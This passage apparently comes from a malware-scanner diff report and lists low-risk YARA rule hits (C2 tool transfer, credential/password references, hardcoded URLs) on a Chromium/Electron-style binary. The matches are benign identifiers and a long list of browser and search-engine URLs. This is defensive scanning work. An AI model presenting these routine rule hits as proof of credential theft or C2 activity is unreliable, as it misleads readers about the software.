[https://yandex.com/search/](https://yandex.com/search/)
[https://yandex.kz/images/search/](https://yandex.kz/images/search/)
[https://yandex.ru/images/search/](https://yandex.ru/images/search/)
[https://yandex.ua/images/search/](https://yandex.ua/images/search/)
[https://yastatic.net/lego/_/pDu9OWAQKB0s2J9IojKpiS_Eho.ico](https://yastatic.net/lego/_/pDu9OWAQKB0s2J9IojKpiS_Eho.ico)
[https://yastatic.net/lego/_/rBTjd6UOPk5913OSn5ZQVYMTQWQ.ico](https://yastatic.net/lego/_/rBTjd6UOPk5913OSn5ZQVYMTQWQ.ico) | -| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [amd64](https://github.com/search?q=amd64&type=code)
[arm64](https://github.com/search?q=arm64&type=code)
[http://](http://)
[https://](https://)
[x86_64](https://github.com/search?q=x86_64&type=code) | -| LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [AccountPasswordsConsent](https://github.com/search?q=AccountPasswordsConsent&type=code)
[ChromePasswordManagerClient](https://github.com/search?q=ChromePasswordManagerClient&type=code)
[GaiaPasswordCaptured](https://github.com/search?q=GaiaPasswordCaptured&type=code)
[GaiaPasswordReuse](https://github.com/search?q=GaiaPasswordReuse&type=code)
[Invalid password pattern](https://github.com/search?q=Invalid+password+pattern&type=code)
[PasswordH](https://github.com/search?q=PasswordH&type=code)
[PasswordIssues](https://github.com/search?q=PasswordIssues&type=code)
[PasswordReuseDetected](https://github.com/search?q=PasswordReuseDetected&type=code)
[PasswordReuseLookup](https://github.com/search?q=PasswordReuseLookup&type=code)
[PasswordReveal](https://github.com/search?q=PasswordReveal&type=code)
[PasswordSpecificsData](https://github.com/search?q=PasswordSpecificsData&type=code)
[SetPasswordFunc](https://github.com/search?q=SetPasswordFunc&type=code)
[Username and password are expected to](https://github.com/search?q=Username+and+password+are+expected+to&type=code)
[a username and password](https://github.com/search?q=a+username+and+password&type=code)
[accessibilityPasswordValuesEnabled](https://github.com/search?q=accessibilityPasswordValuesEnabled&type=code)
[and password fields set](https://github.com/search?q=and+password+fields+set&type=code)
[bPassword](https://github.com/search?q=bPassword&type=code)
[challengePassword](https://github.com/search?q=challengePassword&type=code)
[const has_password](https://github.com/search?q=const+has_password&type=code)
[current-password](https://github.com/search?q=current-password&type=code)
[gaia_password_reuse](https://github.com/search?q=gaia_password_reuse&type=code)
[generated a new password](https://github.com/search?q=generated+a+new+password&type=code)
[get password](https://github.com/search?q=get+password&type=code)
[getPasswordComplete](https://github.com/search?q=getPasswordComplete&type=code)
[have-a-username-password-port](https://github.com/search?q=have-a-username-password-port&type=code)
[have-username-password-port](https://github.com/search?q=have-username-password-port&type=code)
[id-PasswordBasedMAC](https://github.com/search?q=id-PasswordBasedMAC&type=code)
[keyring_delete_password](https://github.com/search?q=keyring_delete_password&type=code)
[keyring_find_password_sync](https://github.com/search?q=keyring_find_password_sync&type=code)
[keyring_free_password](https://github.com/search?q=keyring_free_password&type=code)
[keyring_store_password_sync](https://github.com/search?q=keyring_store_password_sync&type=code)
[like a password](https://github.com/search?q=like+a+password&type=code)
[new-password](https://github.com/search?q=new-password&type=code)
[or PasswordCredentialData](https://github.com/search?q=or+PasswordCredentialData&type=code)
[password based MAC](https://github.com/search?q=password+based+MAC&type=code)
[password is too large](https://github.com/search?q=password+is+too+large&type=code)
[password text](https://github.com/search?q=password+text&type=code)
[password-change](https://github.com/search?q=password-change&type=code)
[password-protection](https://github.com/search?q=password-protection&type=code)
[password-reveal](https://github.com/search?q=password-reveal&type=code)
[password-store](https://github.com/search?q=password-store&type=code)
[passwordChar](https://github.com/search?q=passwordChar&type=code)
[passwordDialogTitle](https://github.com/search?q=passwordDialogTitle&type=code)
[passwordEchoEnabled](https://github.com/search?q=passwordEchoEnabled&type=code)
[passwordEdit](https://github.com/search?q=passwordEdit&type=code)
[passwordInvalid](https://github.com/search?q=passwordInvalid&type=code)
[passwordPrompt](https://github.com/search?q=passwordPrompt&type=code)
[passwordSubmit](https://github.com/search?q=passwordSubmit&type=code)
[password_specifics](https://github.com/search?q=password_specifics&type=code)
[readPassword](https://github.com/search?q=readPassword&type=code)
[secret_password_clear_sync](https://github.com/search?q=secret_password_clear_sync&type=code)
[secret_password_store_sync](https://github.com/search?q=secret_password_store_sync&type=code)
[set password](https://github.com/search?q=set+password&type=code)
[such as passwords](https://github.com/search?q=such+as+passwords&type=code)
[to deserialize password_string](https://github.com/search?q=to+deserialize+password_string&type=code)
[userPassword](https://github.com/search?q=userPassword&type=code)
[username or password](https://github.com/search?q=username+or+password&type=code)
[writePassword](https://github.com/search?q=writePassword&type=code) | +| LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [https://github.com/chromium/chromium/blob/HEAD/third_party/blink/public/platform/web_crypto_algorithm_params.h](https://github.com/chromium/chromium/blob/HEAD/third_party/blink/public/platform/web_crypto_algorithm_params.h)
[http://src.chromium.org/viewvc/blink/trunk/Source/devtools/front_end/SourceMap.js](http://src.chromium.org/viewvc/blink/trunk/Source/devtools/front_end/SourceMap.js)
[https://github.com/nodejs/node/commit/ec2822adaad76b126b5cccdeaa1addf2376c9aa6](https://github.com/nodejs/node/commit/ec2822adaad76b126b5cccdeaa1addf2376c9aa6)
[https://github.com/nodejs/node/commit/f7620fb96d339f704932f9bb9a0dceb9952df2d4](https://github.com/nodejs/node/commit/f7620fb96d339f704932f9bb9a0dceb9952df2d4)
[https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/repairES5.js](https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/repairES5.js)
[https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/startSES.js](https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/startSES.js)
[https://publickeyservice.aws.privacysandboxservices.com/v1alpha/publicKeys](https://publickeyservice.aws.privacysandboxservices.com/v1alpha/publicKeys)
[http://linkurystoragenorthus.blob.core.windows.net/static/favicon.ico](http://linkurystoragenorthus.blob.core.windows.net/static/favicon.ico)
[http://search.iminent.com/SearchTheWeb/v6/1033/homepage/Default.aspx](http://search.iminent.com/SearchTheWeb/v6/1033/homepage/Default.aspx)
[https://github.com/acornjs/acorn/blob/master/acorn/src/identifier.js](https://github.com/acornjs/acorn/blob/master/acorn/src/identifier.js)
[http://search.iminent.com/SearchTheWeb/v6/1033/homepage/Result.aspx](http://search.iminent.com/SearchTheWeb/v6/1033/homepage/Result.aspx)
[https://www.google.com/images/branding/product/ico/googleg_lodp.ico](https://www.google.com/images/branding/product/ico/googleg_lodp.ico)
[http://ms1.iol.it/graph_hf/v.8.3.04/themes/default/img/favicon.ico](http://ms1.iol.it/graph_hf/v.8.3.04/themes/default/img/favicon.ico)
[https://search.yahooapis.jp/AssistSearchService/V2/webassistSearch](https://search.yahooapis.jp/AssistSearchService/V2/webassistSearch)
[https://storage.ape.yandex.net/get/browser/Doodles/yandex/drawable](https://storage.ape.yandex.net/get/browser/Doodles/yandex/drawable)
[http://static.mediacentrum.sk/katalog/atlas.sk/images/favicon.ico](http://static.mediacentrum.sk/katalog/atlas.sk/images/favicon.ico)
[https://ssl.pstatic.net/sstatic/search/favicon/favicon_140327.ico](https://ssl.pstatic.net/sstatic/search/favicon/favicon_140327.ico)
[http://certificates.godaddy.com/repository/gd_intermediate.crt0](http://certificates.godaddy.com/repository/gd_intermediate.crt0)
[https://www.bluetooth.com/specifications/gatt/characteristics](https://www.bluetooth.com/specifications/gatt/characteristics)
[https://www.gstatic.com/securitykey/a/google.com/origins.json](https://www.gstatic.com/securitykey/a/google.com/origins.json)
[http://find.in.gr/Themes/1/Default/Media/Layout/icon_in.png](http://find.in.gr/Themes/1/Default/Media/Layout/icon_in.png)
[https://yastatic.net/lego/_/rBTjd6UOPk5913OSn5ZQVYMTQWQ.ico](https://yastatic.net/lego/_/rBTjd6UOPk5913OSn5ZQVYMTQWQ.ico)
[https://cs.chromium.org/chromium/src/v8/tools/SourceMap.js](https://cs.chromium.org/chromium/src/v8/tools/SourceMap.js)
[https://developers.google.com/web/updates/2016/08/removing](https://developers.google.com/web/updates/2016/08/removing)
[https://yastatic.net/lego/_/pDu9OWAQKB0s2J9IojKpiS_Eho.ico](https://yastatic.net/lego/_/pDu9OWAQKB0s2J9IojKpiS_Eho.ico)
[http://crl.comodoca.com/COMODOCertificationAuthority.crl0](http://crl.comodoca.com/COMODOCertificationAuthority.crl0)
[http://www.3waylabs.com/nw/WWW/products/wizcon/vt220.html](http://www.3waylabs.com/nw/WWW/products/wizcon/vt220.html)
[https://www.bluetooth.com/specifications/gatt/descriptors](https://www.bluetooth.com/specifications/gatt/descriptors)
[https://www.unicode.org/Public/UNIDATA/EastAsianWidth.txt](https://www.unicode.org/Public/UNIDATA/EastAsianWidth.txt)
[https://developers.cloudflare.com/1.1.1.1/privacy/public](https://developers.cloudflare.com/1.1.1.1/privacy/public)
[http://search.iminent.com/Shared/Images/favicon_gl.ico](http://search.iminent.com/Shared/Images/favicon_gl.ico)
[https://developer.chrome.com/docs/extensions/mv3/cross](https://developer.chrome.com/docs/extensions/mv3/cross)
[https://html.spec.whatwg.org/multipage/webappapis.html](https://html.spec.whatwg.org/multipage/webappapis.html)
[https://www.bluetooth.com/specifications/gatt/services](https://www.bluetooth.com/specifications/gatt/services)
[https://www.chromestatus.com/feature/5629582019395584.](https://www.chromestatus.com/feature/5629582019395584.)
[https://www.chromestatus.com/feature/5644273861001216.](https://www.chromestatus.com/feature/5644273861001216.)
[https://www.chromestatus.com/feature/5682658461876224.](https://www.chromestatus.com/feature/5682658461876224.)
[https://www.chromestatus.com/feature/5742188281462784.](https://www.chromestatus.com/feature/5742188281462784.)
[https://www.chromestatus.com/feature/5851021045661696.](https://www.chromestatus.com/feature/5851021045661696.)
[https://beacons.gcp.gvt2.com/domainreliability/upload](https://beacons.gcp.gvt2.com/domainreliability/upload)
[https://nodejs.org/static/images/favicons/favicon.ico](https://nodejs.org/static/images/favicons/favicon.ico)
[https://www.chromestatus.com/feature/4664843055398912](https://www.chromestatus.com/feature/4664843055398912)
[https://www.chromestatus.com/feature/5082396709879808](https://www.chromestatus.com/feature/5082396709879808)
[https://www.chromestatus.com/feature/5093566007214080](https://www.chromestatus.com/feature/5093566007214080)
[https://www.chromestatus.com/feature/5148698084376576](https://www.chromestatus.com/feature/5148698084376576)
[https://www.chromestatus.com/feature/5527160148197376](https://www.chromestatus.com/feature/5527160148197376)
[https://www.chromestatus.com/feature/5636954674692096](https://www.chromestatus.com/feature/5636954674692096)
[https://www.chromestatus.com/feature/5654791610957824](https://www.chromestatus.com/feature/5654791610957824)
[https://www.chromestatus.com/feature/5667793157488640](https://www.chromestatus.com/feature/5667793157488640)
[https://www.chromestatus.com/feature/5669008342777856](https://www.chromestatus.com/feature/5669008342777856)
[https://www.chromestatus.com/feature/5718547946799104](https://www.chromestatus.com/feature/5718547946799104)
[https://www.chromestatus.com/feature/5738264052891648](https://www.chromestatus.com/feature/5738264052891648)
[https://www.chromestatus.com/feature/5745543795965952](https://www.chromestatus.com/feature/5745543795965952)
[https://www.chromestatus.com/feature/5749447073988608](https://www.chromestatus.com/feature/5749447073988608)
[https://www.chromestatus.com/feature/6662647093133312](https://www.chromestatus.com/feature/6662647093133312)
[http://autocomplete.nigma.ru/complete/query_help.php](http://autocomplete.nigma.ru/complete/query_help.php)
[http://crl.comodoca.com/AAACertificateServices.crl06](http://crl.comodoca.com/AAACertificateServices.crl06)
[https://cdn.ecosia.org/assets/images/ico/favicon.ico](https://cdn.ecosia.org/assets/images/ico/favicon.ico)
[https://clients2.google.com/domainreliability/upload](https://clients2.google.com/domainreliability/upload)
[https://github.com/tc39/ecma262/blob/HEAD/LICENSE.md](https://github.com/tc39/ecma262/blob/HEAD/LICENSE.md)
[https://html.spec.whatwg.org/multipage/browsers.html](https://html.spec.whatwg.org/multipage/browsers.html)
[https://www.electronjs.org/docs/tutorial/application](https://www.electronjs.org/docs/tutorial/application)
[https://www.info.com/static/www.info.com/favicon.ico](https://www.info.com/static/www.info.com/favicon.ico)
[https://www.privacywall.org/images/favicon_32x32.ico](https://www.privacywall.org/images/favicon_32x32.ico)
[http://ak.apnstatic.com/media/images/favicon_search](http://ak.apnstatic.com/media/images/favicon_search)
[https://search.goo.ne.jp/cdn/common/img/favicon.ico](https://search.goo.ne.jp/cdn/common/img/favicon.ico)
[https://suggest.search.daum.net/sushi/opensearch/pc](https://suggest.search.daum.net/sushi/opensearch/pc)
[https://www.bing.com/sa/simg/bing_p_rr_teal_min.ico](https://www.bing.com/sa/simg/bing_p_rr_teal_min.ico)
[https://www.googleapis.com/geolocation/v1/geolocate](https://www.googleapis.com/geolocation/v1/geolocate)
[http://arianna.libero.it/search/abin/integrata.cgi](http://arianna.libero.it/search/abin/integrata.cgi)
[https://beacons2.gvt2.com/domainreliability/upload](https://beacons2.gvt2.com/domainreliability/upload)
[https://beacons3.gvt2.com/domainreliability/upload](https://beacons3.gvt2.com/domainreliability/upload)
[https://beacons4.gvt2.com/domainreliability/upload](https://beacons4.gvt2.com/domainreliability/upload)
[https://beacons5.gvt2.com/domainreliability/upload](https://beacons5.gvt2.com/domainreliability/upload)
[https://beacons5.gvt3.com/domainreliability/upload](https://beacons5.gvt3.com/domainreliability/upload)
[https://bugs.chromium.org/p/chromium/issues/detail](https://bugs.chromium.org/p/chromium/issues/detail)
[https://github.com/electron/electron/issues/18397.](https://github.com/electron/electron/issues/18397.)
[https://source.chromium.org/chromium/chromium/src/](https://source.chromium.org/chromium/chromium/src/)
[http://crl.comodo.net/AAACertificateServices.crl0](http://crl.comodo.net/AAACertificateServices.crl0)
[http://dictionaryperceptionrevolutionfoundationpx](http://dictionaryperceptionrevolutionfoundationpx)
[https://beacons.gvt2.com/domainreliability/upload](https://beacons.gvt2.com/domainreliability/upload)
[https://github.com/w3c/ServiceWorker/issues/1356.](https://github.com/w3c/ServiceWorker/issues/1356.)
[https://nodejs.org/download/release/v16.14.2/node](https://nodejs.org/download/release/v16.14.2/node)
[https://www.cisco.com/c/en/us/about/legal/privacy](https://www.cisco.com/c/en/us/about/legal/privacy)
[https://www.sogou.com/images/logo/old/favicon.ico](https://www.sogou.com/images/logo/old/favicon.ico)
[http://start.iminent.com/StartWeb/1033/homepage/](http://start.iminent.com/StartWeb/1033/homepage/)
[https://code.google.com/p/chromium/issues/detail](https://code.google.com/p/chromium/issues/detail)
[https://www.gstatic.com/securitykey/origins.json](https://www.gstatic.com/securitykey/origins.json)
[https://chromium.googlesource.com/chromium/src/](https://chromium.googlesource.com/chromium/src/)
[https://clients2.google.com/service/update2/crx](https://clients2.google.com/service/update2/crx)
[https://redirector.gvt1.com/edgedl/chrome/dict/](https://redirector.gvt1.com/edgedl/chrome/dict/)
[https://sp.ask.com/sh/i/a16/favicon/favicon.ico](https://sp.ask.com/sh/i/a16/favicon/favicon.ico)
[http://certificates.godaddy.com/repository100.](http://certificates.godaddy.com/repository100.)
[https://bugs.chromium.org/p/dawn/issues/detail](https://bugs.chromium.org/p/dawn/issues/detail)
[https://electronjs.org/docs/tutorial/security.](https://electronjs.org/docs/tutorial/security.)
[https://en.wikipedia.org/wiki/ANSI_escape_code](https://en.wikipedia.org/wiki/ANSI_escape_code)
[https://perfetto.dev/docs/contributing/getting](https://perfetto.dev/docs/contributing/getting)
[http://ns.adobe.com/AcrobatAdhocWorkflow/1.0/](http://ns.adobe.com/AcrobatAdhocWorkflow/1.0/)
[https://html.spec.whatwg.org/multipage/timers](https://html.spec.whatwg.org/multipage/timers)
[https://malaysia.search.yahoo.com/favicon.ico](https://malaysia.search.yahoo.com/favicon.ico)
[https://malaysia.search.yahoo.com/sugg/chrome](https://malaysia.search.yahoo.com/sugg/chrome)
[https://monitoring.url.loader.factory.invalid](https://monitoring.url.loader.factory.invalid)
[http://nigma.ru/themes/nigma/img/favicon.ico](http://nigma.ru/themes/nigma/img/favicon.ico)
[https://bugs.chromium.org/p/v8/issues/detail](https://bugs.chromium.org/p/v8/issues/detail)
[https://github.com/gpuweb/gpuweb/issues/1565](https://github.com/gpuweb/gpuweb/issues/1565)
[http://clients3.google.com/cert_upload_json](http://clients3.google.com/cert_upload_json)
[https://developer.chrome.com/blog/immutable](https://developer.chrome.com/blog/immutable)
[https://github.com/electron/electron/tree/v](https://github.com/electron/electron/tree/v)
[https://github.com/joyent/node/issues/3295.](https://github.com/joyent/node/issues/3295.)
[https://github.com/nodejs/node/issues/13435](https://github.com/nodejs/node/issues/13435)
[https://github.com/nodejs/node/issues/19009](https://github.com/nodejs/node/issues/19009)
[https://github.com/nodejs/node/issues/31074](https://github.com/nodejs/node/issues/31074)
[https://github.com/nodejs/node/issues/34532](https://github.com/nodejs/node/issues/34532)
[https://github.com/nodejs/node/issues/35475](https://github.com/nodejs/node/issues/35475)
[https://github.com/nodejs/node/issues/35862](https://github.com/nodejs/node/issues/35862)
[https://github.com/nodejs/node/issues/35981](https://github.com/nodejs/node/issues/35981)
[https://github.com/nodejs/node/issues/39707](https://github.com/nodejs/node/issues/39707)
[https://github.com/nodejs/node/issues/39758](https://github.com/nodejs/node/issues/39758)
[https://github.com/tc39/ecma262/issues/1209](https://github.com/tc39/ecma262/issues/1209)
[http://search.softonic.com/img/favicon.ico](http://search.softonic.com/img/favicon.ico)
[https://buscador.terra.com.ar/Default.aspx](https://buscador.terra.com.ar/Default.aspx)
[https://developer.chrome.com/blog/enabling](https://developer.chrome.com/blog/enabling)
[https://developers.google.com/speed/public](https://developers.google.com/speed/public)
[https://doh.cleanbrowsing.org/doh/security](https://doh.cleanbrowsing.org/doh/security)
[https://github.com/nodejs/node/issues/2006](https://github.com/nodejs/node/issues/2006)
[https://github.com/nodejs/node/issues/2119](https://github.com/nodejs/node/issues/2119)
[https://github.com/nodejs/node/issues/3392](https://github.com/nodejs/node/issues/3392)
[https://github.com/nodejs/node/pull/26334.](https://github.com/nodejs/node/pull/26334.)
[https://github.com/nodejs/node/pull/33515.](https://github.com/nodejs/node/pull/33515.)
[https://search.privacywall.org/suggest.php](https://search.privacywall.org/suggest.php)
[https://searchatlas.centrum.cz/favicon.ico](https://searchatlas.centrum.cz/favicon.ico)
[https://www.privacywall.org/search/secure/](https://www.privacywall.org/search/secure/)
[http://www.ibm.com/data/dtd/v11/ibmxhtml1](http://www.ibm.com/data/dtd/v11/ibmxhtml1)
[https://esdiscuss.org/topic/isconstructor](https://esdiscuss.org/topic/isconstructor)
[https://github.com/libuv/libuv/pull/1501.](https://github.com/libuv/libuv/pull/1501.)
[https://github.com/nodejs/node/pull/12342](https://github.com/nodejs/node/pull/12342)
[https://github.com/nodejs/node/pull/12607](https://github.com/nodejs/node/pull/12607)
[https://github.com/nodejs/node/pull/13870](https://github.com/nodejs/node/pull/13870)
[https://github.com/nodejs/node/pull/21313](https://github.com/nodejs/node/pull/21313)
[https://github.com/nodejs/node/pull/30380](https://github.com/nodejs/node/pull/30380)
[https://github.com/nodejs/node/pull/30958](https://github.com/nodejs/node/pull/30958)
[https://github.com/nodejs/node/pull/33661](https://github.com/nodejs/node/pull/33661)
[https://github.com/nodejs/node/pull/34010](https://github.com/nodejs/node/pull/34010)
[https://github.com/nodejs/node/pull/34103](https://github.com/nodejs/node/pull/34103)
[https://github.com/nodejs/node/pull/34375](https://github.com/nodejs/node/pull/34375)
[https://github.com/nodejs/node/pull/34385](https://github.com/nodejs/node/pull/34385)
[https://github.com/nodejs/node/pull/35949](https://github.com/nodejs/node/pull/35949)
[https://github.com/nodejs/node/pull/36061](https://github.com/nodejs/node/pull/36061)
[https://github.com/nodejs/node/pull/38248](https://github.com/nodejs/node/pull/38248)
[https://github.com/nodejs/node/pull/38433](https://github.com/nodejs/node/pull/38433)
[https://github.com/nodejs/node/pull/38614](https://github.com/nodejs/node/pull/38614)
[https://mathiasbynens.be/notes/javascript](https://mathiasbynens.be/notes/javascript)
[https://sugg.sogou.com/sugg/ajaj_json.jsp](https://sugg.sogou.com/sugg/ajaj_json.jsp)
[https://www.bing.com/images/detail/search](https://www.bing.com/images/detail/search)
[http://search.incredibar.com/favicon.ico](http://search.incredibar.com/favicon.ico)
[https://doh.cleanbrowsing.org/doh/family](https://doh.cleanbrowsing.org/doh/family)
[https://doh.familyshield.opendns.com/dns](https://doh.familyshield.opendns.com/dns)
[https://github.com/addaleax/eventemitter](https://github.com/addaleax/eventemitter)
[https://github.com/nodejs/node/pull/1771](https://github.com/nodejs/node/pull/1771)
[https://github.com/nodejs/node/pull/3394](https://github.com/nodejs/node/pull/3394)
[https://malaysia.search.yahoo.com/search](https://malaysia.search.yahoo.com/search)
[https://stackoverflow.com/a/5501711/3561](https://stackoverflow.com/a/5501711/3561)
[http://buscar.terra.com.ar/Default.aspx](http://buscar.terra.com.ar/Default.aspx)
[http://search.incredibar.com/search.php](http://search.incredibar.com/search.php)
[http://start.sweetpacks.com/favicon.ico](http://start.sweetpacks.com/favicon.ico)
[http://www.w3.org/TR/html4/frameset.dtd](http://www.w3.org/TR/html4/frameset.dtd)
[https://api.oceanhero.today/suggestions](https://api.oceanhero.today/suggestions)
[https://ar.search.yahoo.com/favicon.ico](https://ar.search.yahoo.com/favicon.ico)
[https://ar.search.yahoo.com/sugg/chrome](https://ar.search.yahoo.com/sugg/chrome)
[https://at.search.yahoo.com/favicon.ico](https://at.search.yahoo.com/favicon.ico)
[https://at.search.yahoo.com/sugg/chrome](https://at.search.yahoo.com/sugg/chrome)
[https://au.search.yahoo.com/favicon.ico](https://au.search.yahoo.com/favicon.ico)
[https://au.search.yahoo.com/sugg/chrome](https://au.search.yahoo.com/sugg/chrome)
[https://br.search.yahoo.com/favicon.ico](https://br.search.yahoo.com/favicon.ico)
[https://br.search.yahoo.com/sugg/chrome](https://br.search.yahoo.com/sugg/chrome)
[https://ca.search.yahoo.com/favicon.ico](https://ca.search.yahoo.com/favicon.ico)
[https://ca.search.yahoo.com/sugg/chrome](https://ca.search.yahoo.com/sugg/chrome)
[https://ch.search.yahoo.com/favicon.ico](https://ch.search.yahoo.com/favicon.ico)
[https://ch.search.yahoo.com/sugg/chrome](https://ch.search.yahoo.com/sugg/chrome)
[https://cl.search.yahoo.com/favicon.ico](https://cl.search.yahoo.com/favicon.ico)
[https://cl.search.yahoo.com/sugg/chrome](https://cl.search.yahoo.com/sugg/chrome)
[https://co.search.yahoo.com/favicon.ico](https://co.search.yahoo.com/favicon.ico)
[https://co.search.yahoo.com/sugg/chrome](https://co.search.yahoo.com/sugg/chrome)
[https://creativecommons.org/licenses/by](https://creativecommons.org/licenses/by)
[https://de.search.yahoo.com/favicon.ico](https://de.search.yahoo.com/favicon.ico)
[https://de.search.yahoo.com/sugg/chrome](https://de.search.yahoo.com/sugg/chrome)
[https://dk.search.yahoo.com/favicon.ico](https://dk.search.yahoo.com/favicon.ico)
[https://doh.cleanbrowsing.org/doh/adult](https://doh.cleanbrowsing.org/doh/adult)
[https://es.search.yahoo.com/favicon.ico](https://es.search.yahoo.com/favicon.ico)
[https://es.search.yahoo.com/sugg/chrome](https://es.search.yahoo.com/sugg/chrome)
[https://fi.search.yahoo.com/favicon.ico](https://fi.search.yahoo.com/favicon.ico)
[https://fr.search.yahoo.com/favicon.ico](https://fr.search.yahoo.com/favicon.ico)
[https://fr.search.yahoo.com/sugg/chrome](https://fr.search.yahoo.com/sugg/chrome)
[https://github.com/w3c/gamepad/pull/112](https://github.com/w3c/gamepad/pull/112)
[https://github.com/w3c/gamepad/pull/120](https://github.com/w3c/gamepad/pull/120)
[https://hk.search.yahoo.com/favicon.ico](https://hk.search.yahoo.com/favicon.ico)
[https://hk.search.yahoo.com/sugg/chrome](https://hk.search.yahoo.com/sugg/chrome)
[https://id.search.yahoo.com/favicon.ico](https://id.search.yahoo.com/favicon.ico)
[https://id.search.yahoo.com/sugg/chrome](https://id.search.yahoo.com/sugg/chrome)
[https://in.search.yahoo.com/favicon.ico](https://in.search.yahoo.com/favicon.ico)
[https://in.search.yahoo.com/sugg/chrome](https://in.search.yahoo.com/sugg/chrome)
[https://log.getdropbox.com/log/expectct](https://log.getdropbox.com/log/expectct)
[https://mx.search.yahoo.com/favicon.ico](https://mx.search.yahoo.com/favicon.ico)
[https://mx.search.yahoo.com/sugg/chrome](https://mx.search.yahoo.com/sugg/chrome)
[https://nl.search.yahoo.com/favicon.ico](https://nl.search.yahoo.com/favicon.ico)
[https://nl.search.yahoo.com/sugg/chrome](https://nl.search.yahoo.com/sugg/chrome)
[https://nz.search.yahoo.com/favicon.ico](https://nz.search.yahoo.com/favicon.ico)
[https://nz.search.yahoo.com/sugg/chrome](https://nz.search.yahoo.com/sugg/chrome)
[https://pe.search.yahoo.com/favicon.ico](https://pe.search.yahoo.com/favicon.ico)
[https://pe.search.yahoo.com/sugg/chrome](https://pe.search.yahoo.com/sugg/chrome)
[https://ph.search.yahoo.com/favicon.ico](https://ph.search.yahoo.com/favicon.ico)
[https://ph.search.yahoo.com/sugg/chrome](https://ph.search.yahoo.com/sugg/chrome)
[https://qc.search.yahoo.com/favicon.ico](https://qc.search.yahoo.com/favicon.ico)
[https://qc.search.yahoo.com/sugg/chrome](https://qc.search.yahoo.com/sugg/chrome)
[https://se.search.yahoo.com/favicon.ico](https://se.search.yahoo.com/favicon.ico)
[https://sg.search.yahoo.com/favicon.ico](https://sg.search.yahoo.com/favicon.ico)
[https://sg.search.yahoo.com/sugg/chrome](https://sg.search.yahoo.com/sugg/chrome)
[https://th.search.yahoo.com/favicon.ico](https://th.search.yahoo.com/favicon.ico)
[https://th.search.yahoo.com/sugg/chrome](https://th.search.yahoo.com/sugg/chrome)
[https://tr.search.yahoo.com/favicon.ico](https://tr.search.yahoo.com/favicon.ico)
[https://tw.search.yahoo.com/favicon.ico](https://tw.search.yahoo.com/favicon.ico)
[https://tw.search.yahoo.com/sugg/chrome](https://tw.search.yahoo.com/sugg/chrome)
[https://uk.search.yahoo.com/favicon.ico](https://uk.search.yahoo.com/favicon.ico)
[https://uk.search.yahoo.com/sugg/chrome](https://uk.search.yahoo.com/sugg/chrome)
[https://ve.search.yahoo.com/favicon.ico](https://ve.search.yahoo.com/favicon.ico)
[https://ve.search.yahoo.com/sugg/chrome](https://ve.search.yahoo.com/sugg/chrome)
[https://vn.search.yahoo.com/favicon.ico](https://vn.search.yahoo.com/favicon.ico)
[https://vn.search.yahoo.com/sugg/chrome](https://vn.search.yahoo.com/sugg/chrome)
[https://www.yandex.com.tr/chrome/newtab](https://www.yandex.com.tr/chrome/newtab)
[http://buscar.terra.com.ar/favicon.ico](http://buscar.terra.com.ar/favicon.ico)
[http://i.rl0.ru/2011/icons/rambler.ico](http://i.rl0.ru/2011/icons/rambler.ico)
[http://i.wp.pl/a/i/stg/500/favicon.ico](http://i.wp.pl/a/i/stg/500/favicon.ico)
[http://search.conduit.com/Results.aspx](http://search.conduit.com/Results.aspx)
[http://start.sweetpacks.com/search.asp](http://start.sweetpacks.com/search.asp)
[http://www.apache.org/licenses/LICENSE](http://www.apache.org/licenses/LICENSE)
[http://www.w3.org/TR/xhtml1/DTD/xhtml1](http://www.w3.org/TR/xhtml1/DTD/xhtml1)
[https://buscador.terra.es/Default.aspx](https://buscador.terra.es/Default.aspx)
[https://datatracker.ietf.org/doc/draft](https://datatracker.ietf.org/doc/draft)
[https://gist.github.com/XVilka/8346728](https://gist.github.com/XVilka/8346728)
[https://github.com/KhronosGroup/Vulkan](https://github.com/KhronosGroup/Vulkan)
[https://search.yahoo.co.jp/favicon.ico](https://search.yahoo.co.jp/favicon.ico)
[http://buscador.terra.es/Default.aspx](http://buscador.terra.es/Default.aspx)
[http://search.babylon.com/favicon.ico](http://search.babylon.com/favicon.ico)
[http://search.sweetim.com/favicon.ico](http://search.sweetim.com/favicon.ico)
[http://searchfunmoods.com/favicon.ico](http://searchfunmoods.com/favicon.ico)
[http://searchfunmoods.com/results.php](http://searchfunmoods.com/results.php)
[http://www.w3.org/TR/html4/strict.dtd](http://www.w3.org/TR/html4/strict.dtd)
[http://www.webrtc.org/experiments/rtp](http://www.webrtc.org/experiments/rtp)
[https://c.android.clients.google.com/](https://c.android.clients.google.com/)
[https://clients3.google.com/ct_upload](https://clients3.google.com/ct_upload)
[https://developer.chrome.com/blog/mv2](https://developer.chrome.com/blog/mv2)
[https://discord.com/invite/APGC3k5yaH](https://discord.com/invite/APGC3k5yaH)
[https://github.com/WebBluetoothCG/web](https://github.com/WebBluetoothCG/web)
[https://gpuweb.github.io/gpuweb/wgsl/](https://gpuweb.github.io/gpuweb/wgsl/)
[https://linux.die.net/man/1/dircolors](https://linux.die.net/man/1/dircolors)
[https://search.naver.com/search.naver](https://search.naver.com/search.naver)
[https://suggest.seznam.cz/fulltext_ff](https://suggest.seznam.cz/fulltext_ff)
[https://suggest.seznam.sk/fulltext_ff](https://suggest.seznam.sk/fulltext_ff)
[https://suggest.yandex.com.tr/suggest](https://suggest.yandex.com.tr/suggest)
[https://www.chromium.org/blink/origin](https://www.chromium.org/blink/origin)
[https://www.googleapis.com/spelling/v](https://www.googleapis.com/spelling/v)
[https://www.verisign.com/cps04000000Z](https://www.verisign.com/cps04000000Z)
[http://buscador.terra.es/favicon.ico](http://buscador.terra.es/favicon.ico)
[http://search.sweetim.com/search.asp](http://search.sweetim.com/search.asp)
[http://www.brynosaurus.com/cachedir/](http://www.brynosaurus.com/cachedir/)
[http://www.w3.org/1999/XSL/Transform](http://www.w3.org/1999/XSL/Transform)
[http://www.w3.org/TR/html4/loose.dtd](http://www.w3.org/TR/html4/loose.dtd)
